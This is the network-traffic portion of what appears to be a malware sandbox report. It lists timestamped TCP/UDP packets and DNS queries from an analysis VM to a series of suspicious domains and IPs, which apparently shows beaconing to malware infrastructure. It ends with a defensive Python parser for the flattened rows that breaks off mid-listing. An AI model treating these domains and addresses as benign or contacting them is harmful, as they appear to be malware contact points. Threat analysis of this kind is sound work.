                                                                                Nov 26, 2024 09:29:34.609854937 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:34.615170956 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.629225969 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:34.750664949 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:35.890691042 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:35.890749931 CET8049739199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:35.890806913 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:36.142626047 CET4973980192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.161456108 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.281579971 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:37.281728983 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.297075987 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:37.417334080 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:37.417426109 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:38.677603960 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:38.677727938 CET8049740199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:38.678072929 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:38.798762083 CET4974080192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:39.818459988 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:39.938606024 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:39.938704967 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:39.949367046 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:40.069726944 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:41.219185114 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:41.219259024 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:41.221071959 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:41.223666906 CET4974180192.168.2.8199.192.23.123
                                                                                Nov 26, 2024 09:29:41.343585968 CET8049741199.192.23.123192.168.2.8
                                                                                Nov 26, 2024 09:29:46.898818016 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:47.020006895 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:47.022932053 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:47.037352085 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:47.157455921 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:48.196850061 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:48.197726011 CET8049742104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:48.197788954 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:48.549293041 CET4974280192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.568598032 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.688803911 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:49.688895941 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.708719015 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:49.828756094 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:50.901792049 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:50.902374983 CET8049743104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:50.905903101 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:51.220550060 CET4974380192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.240808964 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.361985922 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:52.362637043 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.599502087 CET4974480192.168.2.8104.21.36.239
                                                                                Nov 26, 2024 09:29:52.725111961 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:52.725125074 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572052956 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572252989 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572448015 CET8049744104.21.36.239192.168.2.8
                                                                                Nov 26, 2024 09:29:53.572487116 CET4974480192.168.2.8104.21.36.239
Nov 26, 2024 09:29:53.572535038 CET | 49744 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:54.111182928 CET | 49744 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:55.209359884 CET | 49745 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:55.329508066 CET | 80 | 49745 | 104.21.36.239 | 192.168.2.8
Nov 26, 2024 09:29:55.329936028 CET | 49745 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:55.430844069 CET | 49745 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:55.551949978 CET | 80 | 49745 | 104.21.36.239 | 192.168.2.8
Nov 26, 2024 09:29:56.496787071 CET | 80 | 49745 | 104.21.36.239 | 192.168.2.8
Nov 26, 2024 09:29:56.496808052 CET | 80 | 49745 | 104.21.36.239 | 192.168.2.8
Nov 26, 2024 09:29:56.496820927 CET | 80 | 49745 | 104.21.36.239 | 192.168.2.8
Nov 26, 2024 09:29:56.496958017 CET | 49745 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:56.499608994 CET | 49745 | 80 | 192.168.2.8 | 104.21.36.239
Nov 26, 2024 09:29:56.620301008 CET | 80 | 49745 | 104.21.36.239 | 192.168.2.8
Nov 26, 2024 09:30:03.724653959 CET | 49746 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:03.844803095 CET | 80 | 49746 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:03.844943047 CET | 49746 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:03.863311052 CET | 49746 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:03.983339071 CET | 80 | 49746 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:05.004369974 CET | 80 | 49746 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:05.004451990 CET | 49746 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:05.377224922 CET | 49746 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:05.497307062 CET | 80 | 49746 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:06.396356106 CET | 49747 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:06.517519951 CET | 80 | 49747 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:06.517608881 CET | 49747 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:06.536222935 CET | 49747 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:06.690916061 CET | 80 | 49747 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:07.775907040 CET | 80 | 49747 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:07.775975943 CET | 49747 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:08.048683882 CET | 49747 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:08.168912888 CET | 80 | 49747 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:09.067430019 CET | 49748 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:09.188385010 CET | 80 | 49748 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:09.188582897 CET | 49748 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:09.204523087 CET | 49748 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:09.325223923 CET | 80 | 49748 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:09.325237036 CET | 80 | 49748 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:10.347011089 CET | 80 | 49748 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:10.347079039 CET | 49748 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:10.720916986 CET | 49748 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:10.840948105 CET | 80 | 49748 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:11.739646912 CET | 49749 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:11.859715939 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:11.859821081 CET | 49749 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:11.870946884 CET | 49749 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:11.991183996 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:13.423017979 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:13.423084021 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:13.423120022 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:13.423154116 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:13.423588991 CET | 49749 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:13.427943945 CET | 49749 | 80 | 192.168.2.8 | 208.91.197.27
Nov 26, 2024 09:30:13.547875881 CET | 80 | 49749 | 208.91.197.27 | 192.168.2.8
Nov 26, 2024 09:30:19.703794956 CET | 49750 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:19.824158907 CET | 80 | 49750 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:19.824261904 CET | 49750 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:19.841239929 CET | 49750 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:19.961277962 CET | 80 | 49750 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:20.966624022 CET | 80 | 49750 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:20.966640949 CET | 80 | 49750 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:20.966655970 CET | 80 | 49750 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:20.966728926 CET | 49750 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:21.345750093 CET | 49750 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:22.364896059 CET | 49751 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:22.488760948 CET | 80 | 49751 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:22.488850117 CET | 49751 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:22.507232904 CET | 49751 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:22.627260923 CET | 80 | 49751 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:23.585691929 CET | 80 | 49751 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:23.585711002 CET | 80 | 49751 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:23.585725069 CET | 80 | 49751 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:23.586005926 CET | 49751 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:24.017657995 CET | 49751 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:25.038876057 CET | 49752 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:25.158993959 CET | 80 | 49752 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:25.159193993 CET | 49752 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:25.182893991 CET | 49752 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:25.303400993 CET | 80 | 49752 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:25.303419113 CET | 80 | 49752 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:26.306643009 CET | 80 | 49752 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:26.306710005 CET | 80 | 49752 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:26.306727886 CET | 80 | 49752 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:26.306751013 CET | 49752 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:26.306783915 CET | 49752 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:26.690882921 CET | 49752 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:27.709347010 CET | 49753 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:27.829370022 CET | 80 | 49753 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:27.829449892 CET | 49753 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:27.840614080 CET | 49753 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:27.962596893 CET | 80 | 49753 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:28.971760035 CET | 80 | 49753 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:28.971817970 CET | 80 | 49753 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:28.971829891 CET | 80 | 49753 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:28.972131014 CET | 49753 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:28.976952076 CET | 49753 | 80 | 192.168.2.8 | 199.59.243.227
Nov 26, 2024 09:30:29.096868992 CET | 80 | 49753 | 199.59.243.227 | 192.168.2.8
Nov 26, 2024 09:30:34.801312923 CET | 49754 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:34.921293020 CET | 80 | 49754 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:34.921535015 CET | 49754 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:34.935585022 CET | 49754 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:35.055473089 CET | 80 | 49754 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:36.069673061 CET | 80 | 49754 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:36.069746017 CET | 49754 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:36.439383984 CET | 49754 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:36.559416056 CET | 80 | 49754 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:37.458029985 CET | 49755 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:37.578063011 CET | 80 | 49755 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:37.578181028 CET | 49755 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:37.594918013 CET | 49755 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:37.715042114 CET | 80 | 49755 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:38.775367975 CET | 80 | 49755 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:38.779038906 CET | 49755 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:39.098907948 CET | 49755 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:39.218964100 CET | 80 | 49755 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:40.122998953 CET | 49756 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:40.242974997 CET | 80 | 49756 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:40.243268967 CET | 49756 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:40.393663883 CET | 49756 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:40.515094995 CET | 80 | 49756 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:40.515106916 CET | 80 | 49756 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:41.356503963 CET | 80 | 49756 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:41.356770992 CET | 49756 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:41.923902035 CET | 49756 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:42.043837070 CET | 80 | 49756 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:43.134128094 CET | 49757 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:43.256153107 CET | 80 | 49757 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:43.256350040 CET | 49757 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:43.267810106 CET | 49757 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:43.388448000 CET | 80 | 49757 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:44.357635975 CET | 80 | 49757 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:44.357691050 CET | 80 | 49757 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:44.357789040 CET | 49757 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:44.360634089 CET | 49757 | 80 | 192.168.2.8 | 13.248.169.48
Nov 26, 2024 09:30:44.480751038 CET | 80 | 49757 | 13.248.169.48 | 192.168.2.8
Nov 26, 2024 09:30:49.757535934 CET | 49758 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:49.877546072 CET | 80 | 49758 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:49.877655029 CET | 49758 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:49.893357992 CET | 49758 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:50.013259888 CET | 80 | 49758 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:51.410985947 CET | 49758 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:51.572593927 CET | 80 | 49758 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:52.427670956 CET | 49759 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:52.549597025 CET | 80 | 49759 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:52.549714088 CET | 49759 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:52.564970970 CET | 49759 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:52.685081005 CET | 80 | 49759 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:54.080116034 CET | 49759 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:54.240576982 CET | 80 | 49759 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:55.098947048 CET | 49760 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:55.218957901 CET | 80 | 49760 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:55.221982956 CET | 49760 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:55.242955923 CET | 49760 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:55.362948895 CET | 80 | 49760 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:55.363003969 CET | 80 | 49760 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:56.752028942 CET | 49760 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:56.916757107 CET | 80 | 49760 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:57.771718979 CET | 49761 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:57.891872883 CET | 80 | 49761 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:30:57.891952991 CET | 49761 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:57.903362036 CET | 49761 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:30:58.023376942 CET | 80 | 49761 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:31:11.823551893 CET | 80 | 49758 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:31:11.823880911 CET | 49758 | 80 | 192.168.2.8 | 185.26.237.170
Nov 26, 2024 09:31:14.439376116 CET | 80 | 49759 | 185.26.237.170 | 192.168.2.8
Nov 26, 2024 09:31:14.441425085 CET | 49759 | 80 | 192.168.2.8 | 185.26.237.170
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 09:27:34.451788902 CET | 59481 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:27:34.934351921 CET | 53 | 59481 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:27:51.208942890 CET | 53618 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:27:51.565223932 CET | 53 | 53618 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:28:06.130894899 CET | 55251 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:28:06.652930975 CET | 53 | 55251 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:28:20.943269014 CET | 59004 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:28:21.580218077 CET | 53 | 59004 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:28:36.021507025 CET | 59598 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:28:36.927489996 CET | 53 | 59598 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:28:52.208199978 CET | 62787 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:28:52.613905907 CET | 53 | 62787 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:29:00.682449102 CET | 53294 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:29:01.066418886 CET | 53 | 53294 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:29:15.349103928 CET | 49955 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:29:16.275991917 CET | 53 | 49955 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:29:31.318180084 CET | 64987 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:29:31.806231976 CET | 53 | 64987 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:29:46.239993095 CET | 53680 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:29:46.893877983 CET | 53 | 53680 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:01.509212017 CET | 56972 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:02.519387960 CET | 56972 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:03.520962954 CET | 56972 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:03.721390009 CET | 53 | 56972 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:03.721419096 CET | 53 | 56972 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:03.721487045 CET | 53 | 56972 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:18.442737103 CET | 55577 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:19.439452887 CET | 55577 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:19.700972080 CET | 53 | 55577 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:19.701006889 CET | 53 | 55577 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:33.990149021 CET | 62340 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:34.797194004 CET | 53 | 62340 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:30:49.366940975 CET | 61056 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:30:49.754765987 CET | 53 | 61056 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 09:27:34.451788902 CET | 192.168.2.8 | 1.1.1.1 | 0x1867 | Standard query (0) | www.dojodigitize.shop | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:27:51.208942890 CET | 192.168.2.8 | 1.1.1.1 | 0xa356 | Standard query (0) | www.masterqq.pro | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:06.130894899 CET | 192.168.2.8 | 1.1.1.1 | 0x7441 | Standard query (0) | www.hasan.cloud | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:20.943269014 CET | 192.168.2.8 | 1.1.1.1 | 0xfa34 | Standard query (0) | www.0be.info | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:36.021507025 CET | 192.168.2.8 | 1.1.1.1 | 0x2a3f | Standard query (0) | www.tageting.shop | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:28:52.208199978 CET | 192.168.2.8 | 1.1.1.1 | 0x5562 | Standard query (0) | www.ulojenukw.shop | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:00.682449102 CET | 192.168.2.8 | 1.1.1.1 | 0x3e73 | Standard query (0) | www.ssps.shop | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:15.349103928 CET | 192.168.2.8 | 1.1.1.1 | 0xe483 | Standard query (0) | www.qqc5.top | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:31.318180084 CET | 192.168.2.8 | 1.1.1.1 | 0x3023 | Standard query (0) | www.learnnow.info | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:29:46.239993095 CET | 192.168.2.8 | 1.1.1.1 | 0x9250 | Standard query (0) | www.goldbracelet.top | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:01.509212017 CET | 192.168.2.8 | 1.1.1.1 | 0x8ae6 | Standard query (0) | www.regislemberthe.online | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:02.519387960 CET | 192.168.2.8 | 1.1.1.1 | 0x8ae6 | Standard query (0) | www.regislemberthe.online | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:03.520962954 CET | 192.168.2.8 | 1.1.1.1 | 0x8ae6 | Standard query (0) | www.regislemberthe.online | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:18.442737103 CET | 192.168.2.8 | 1.1.1.1 | 0x5dcc | Standard query (0) | www.honk.city | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:19.439452887 CET | 192.168.2.8 | 1.1.1.1 | 0x5dcc | Standard query (0) | www.honk.city | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:33.990149021 CET | 192.168.2.8 | 1.1.1.1 | 0x4487 | Standard query (0) | www.gupiao.bet | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:30:49.366940975 CET | 192.168.2.8 | 1.1.1.1 | 0x382e | Standard query (0) | www.fengzheng.shop | A (IP address) | IN (0x0001) | false
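The TCP, UDP and DNS-query tables above were extracted with their column separators dropped, so a row such as "4974480192.168.2.8104.21.36.239" must be cut back into ports and addresses before the traffic can be correlated. The following Python is an added example and not part of the Joe Sandbox report: it rebuilds rows copied from these tables, groups packets into sessions, attributes each port-80 session to the domain queried most recently before it started, and measures how often a new domain is queried (a new name roughly every 15 s in this run, each followed by a few short port-80 sessions). GUEST_IP, SERVICE_PORTS, the ephemeral-port range and the time-based attribution are assumptions; the DNS answer table further down is the authoritative name-to-address mapping and should be used to confirm the attribution.

```python
"""Rebuild the flattened Joe Sandbox network rows and tie each port-80 session to the DNS
query that preceded it.  Added example, not part of the report: the SAMPLE_* rows are copied
from this report's TCP, UDP and DNS-query tables as extracted (column separators dropped);
GUEST_IP, SERVICE_PORTS and EPHEMERAL are assumptions used to undo that concatenation."""
import re
from datetime import datetime

GUEST_IP = "192.168.2.8"          # the analysis VM in this report (assumption)
SERVICE_PORTS = {53, 80, 443}     # assumption: the remote side of every row uses one of these
EPHEMERAL = range(49152, 65536)   # Windows dynamic client-port range (assumption)
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"{OCTET}(?:\.{OCTET}){{3}}")
QUERY_RE = re.compile(r"(?P<ips>[\d.]+)(?P<id>0x[0-9a-f]{4})Standard query \(0\)"
                      r"(?P<name>.+?)[A-Z]+ \([^)]*\)IN \(0x0001\)(?:true|false)")

SAMPLE_PACKETS = [  # TCP and UDP rows copied from this report
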